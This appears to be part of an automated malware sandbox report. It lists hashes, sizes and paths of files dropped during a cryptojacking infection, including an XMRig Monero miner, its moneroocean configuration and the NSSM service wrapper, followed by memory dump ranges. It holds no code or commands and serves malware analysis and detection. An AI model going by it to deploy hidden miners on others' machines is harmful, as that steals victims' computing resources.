2eed23e115ef2dbb17fc2cbf791419c0d7b61029ead728c38a3b04c0a13d49c8

SHA512
79e3e1b54065f3940904600210c3380ddb3113a3d5197e49d8372e80fd4f83741c7b2332c8bdb3909ca0785fd202c8241e6d040e932116f746b8345a8e0d1b29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ed5b6150f76a466c444415d351c69927

SHA1
bd717cea1bc235eb826d02ec56f6091fc3c4aef3

SHA256
843257ce9a6dc747c802209cce7294e2a20bdab9e5fc8928d9c2712908e2a512

SHA512
351d4b05eef1d8a80bbf348430ae11d3c65fdb08fbdbc40fbe13458b4fc6f0e35b781b6c402001ca748b7930416fa78006048199effae37196380cc48dd38695

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d2c39174bce51204378bb531ad2de54a

SHA1
e2febbb4655ead3dc12c0cff3a995a73199a09bf

SHA256
42224901f7323afd569dc58e71a173a87ed94ed87f246ef0931e438f8100f29e

SHA512
591183345a8e8fcec538481f75222a392229839a581d64acea221c80f06ce9abf40d4c87c465b742c97554c8340524ae45563121052add4ae0713d64fcec7d89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08960d4e1a85f1de0bd63f10d7814363

SHA1
78346ea77a61371391c834785baaba4c919f45fb

SHA256
8b8649fb67f75fff81fb0bf24cfa1ec710c553162d0b1092e236358bafa7178f

SHA512
b943ddcce5c8d66e1be9c7bd2afc59b62f81a271091a7b4aaf9bcf38fb5d4acbe11e4e6182de853bd7bec86b25ecfb0cafa1bcd1005449c8d6877268e690182e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
39c9d7a1bd9ee90152b7893337a3b2ec

SHA1
72c741d65589b6798c1fdbae6fa28c839d5fda9b

SHA256
b2bee132413a68b9114f8fc1d706f3b85667e0710b4f55c90930cca5a73721e2

SHA512
4fe7378de90f252270e35c6951bce7993d1e05fb7131ac03a2acf67595107c870c32583858f71283f0d40bfd35edacda6863498a96b72c0855f072a931e2643a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_roq3v5gj.3qy.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7659.tmp.bat

Filesize
14KB

MD5
012a668bd1043d6b0a4bcd03d02ded41

SHA1
8595831d19a06d5ad38cb38b793eb1bdcc16b816

SHA256
57375e5d331ed567ca2da98b126ac585ff7829d15c31ad98eb452339e3ba1d05

SHA512
e43947f10872db119daa4f28c70046941602831a8e8a871ccad45f8712a972d76b31a05282de7f4bc99d2e23fe40ef9dceaef3ea84b7c6532b85fee920269792

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e4499a2d2a34e1d5b10835302f797678

SHA1
1b2e59b72c3557c44ea2b7f87ea6eb364644d7ee

SHA256
8566d085121a26714a098c61ef75fbb097fd90c5ade79b39a61416fc827eaa31

SHA512
757e7b1b1fabfb196d305f38ad85a8975d4830c3d37dbcd0c0ae41ac3ffb3cc38b80c2e91d8b9c0f1520b1dca9ecb718c3cb1217a7a65d36c3e34b124f2e3498

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
98181d8f6601d0546e9ec5d4fb6a000b

SHA1
804809e227b82fe6621737cbc509db2335303a1d

SHA256
a193cf039b914367197c9cfc36607058a0b284f7125bc46530fe0134f3971b4d

SHA512
559ef1e09aab71a8b44a8873b6353015c87f6d04aee6acc76ee5ab98aa34d3e4290d749abf683ca730f59cd729a5beb0f2568ce2f40516913ebc81c3a103717d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
38244c7a2e8e6ba38f359b02eb0d85ce

SHA1
190a740ecea7ad5286df338c50146a333be09996

SHA256
a25c1ec38014e9cedacf5feccc132b00ebe8921d8bf7b6349ab180cd209d5b90

SHA512
03e0a4a93fd8303c3996986009e9d0f03d41a7cef549e04b091b6252e018a26cf3cc3db1d5ccd3eb83a847df12e22e98402df4aa00990e9c3c5ba8725684068b

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/216-414-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

Filesize
9.9MB

Download
memory/216-403-0x00007FFC45323000-0x00007FFC45324000-memory.dmp

Filesize
4KB

Download
memory/216-9-0x000001F76D0D0000-0x000001F76D146000-memory.dmp

Filesize
472KB

Download
memory/216-3-0x00007FFC45323000-0x00007FFC45324000-memory.dmp

Filesize
4KB

Download
memory/216-5-0x000001F76CF20000-0x000001F76CF42000-memory.dmp

Filesize
136KB

Download
memory/216-25-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

Filesize
9.9MB

Download
memory/216-10-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

Filesize
9.9MB

Download
memory/216-404-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

Filesize
9.9MB

Download
memory/216-6-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

Filesize
9.9MB

Download
memory/4304-428-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-430-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-415-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-433-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-432-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-431-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-417-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-418-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-419-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-420-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-416-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4304-429-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4308-130-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/4308-131-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5012-87-0x000001B178220000-0x000001B17822A000-memory.dmp

Filesize
40KB

Download
memory/5012-88-0x000001B1783F0000-0x000001B178402000-memory.dmp

Filesize
72KB

Download